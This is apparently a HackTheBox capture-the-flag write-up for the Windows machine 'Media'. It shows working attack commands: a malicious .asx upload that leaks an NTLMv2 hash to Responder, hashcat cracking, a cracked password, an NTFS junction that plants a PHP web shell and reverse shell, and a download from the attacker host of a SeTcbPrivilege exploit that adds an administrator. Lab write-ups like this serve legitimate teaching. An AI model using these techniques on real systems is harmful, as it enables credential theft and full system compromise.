HackTheBox Media writeup

Back with a new writeup

Overview:
Media is a Medium-difficulty Windows machine from HackTheBox (VulnLab) running an Apache XAMPP stack with a custom PHP web application. The file upload functionality can be abused to leak an NTLMv2 hash, which can be cracked to obtain credentials and gain initial access via SSH.

Afterward, analyzing the application’s source code reveals the upload storage path, enabling an NTFS Junction attack to upload a malicious PHP web shell and achieve RCE. Finally, privilege escalation is achieved by abusing SeTcbPrivilege or regaining SeImpersonate to elevate privileges to NT AUTHORITY\SYSTEM.

Enumeration

RustScan-Nmap

Let’s start the enumeration:

Enum Http/80

I started by enumerating web page

As mentioned in the photo above we can upload video files, so I figured that it might be ntlm relay attack, then I used ntlm_theft to generate malicious file with .asx extension

.asx – via Windows Media Player playlist (Better, primary open)

python3 tools/ntlm_theft.py -g asx -s 10.10.14.115 --filename shell

Next started responder to capture the hash

sudo responder -I tun0 -dwv

Then I uploaded the file

and suiii we did it.

Now we have ntlmv2 hash for enox,then let's running hashcat to crack the hash

hashcat -m 5600 ntlmv2 /usr/share/wordlists/rockyou.txt

Nice now we have user creds: enox:1234virus@ now we can try login using ssh or rdp

I managed to gain foothold using ssh and captured the user.txt flag

Lateral Movement

We can start with enumeration of the target and we can start with the webapp application directory source code to find any hard coded credentials that may be readable.

First, I reviewed index.php

<?php
error_reporting(0);

    // Your PHP code for handling form submission and file upload goes here.
    $uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
        $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
        $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
        $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

        // Create a folder name using the MD5 hash of Firstname + Lastname + Email
        $folderName = md5($firstname . $lastname . $email);

        // Create the full upload directory path
        $targetDir = $uploadDir . $folderName . '/';

        // Ensure the directory exists; create it if not
        if (!file_exists($targetDir)) {
            mkdir($targetDir, 0777, true);
        }

        // Sanitize the filename to remove unsafe characters
        $originalFilename = $_FILES["fileToUpload"]["name"];
        $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);


        // Build the full path to the target file
        $targetFile = $targetDir . $sanitizedFilename;

        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
            echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";

            // Update the todo.txt file
            $todoFile = $uploadDir . 'todo.txt';
            $todoContent = "Filename: " . $originalFilename . ", Random Variable: " . $folderName . "\n";

            // Append the new line to the file
            file_put_contents($todoFile, $todoContent, FILE_APPEND);
        } else {
            echo "<script>alert('Uh oh, something went wrong... Please submit again');</script>";
        }
    }
    ?>

From the source code, we can extract two important details: the base upload directory and the logic used to generate the upload path. The application stores uploaded files under the following directory:

$uploadDir = 'C:/Windows/Tasks/Uploads/';
$folderName = md5($firstname . $lastname . $email);

This means that each user’s files are stored inside a folder whose name is derived from the MD5 hash of the concatenated first name, last name, and email address. By calculating this MD5 hash using the same inputs, we can predict the exact folder name and verify it against the directory where uploaded files are stored.

Arbitrary File Write to RCE via Junction

1) Upload Webshell

We can see f323599927054a9351e0927d6002b64b:

After removing the directory, let's make a link:

mklink /J C:\Windows\Tasks\Uploads\f323599927054a9351e0927d6002b64b C:\xampp\htdocs

Now I'll upload the webshell, Let's check If the link worked:

Now let's upload reverse shell using this webshell:

And It worked:

privilege escalation

After checking our privs we found SeTcbPrivilege:

SeTcbPrivilege

It is a Windows privilege that allows a process or user to operate as part of the OS.
With this privilege, a process can impersonate users, create tokens, and perform highly sensitive system-level actions.
It is one of the most powerful privileges in Windows and is rarely granted because it can lead to full system compromise if abused.

This privilege can be leveraged to achieve privilege escalation using the following technique https://github.com/b4lisong/SeTcbPrivilege-Abuse

I uploaded TcbElevation-x64.exe:

curl http://10.10.14.139:8000/TcbElevation-x64.exe -o TcbElevation-x64.exe

then let's add our user enox to the Administrators group

.\TcbElevation-x64.exe elevate "net localgroup Administrators enox /add"

Finally, we reconnect via SSH with elevated privileges to obtain the flag.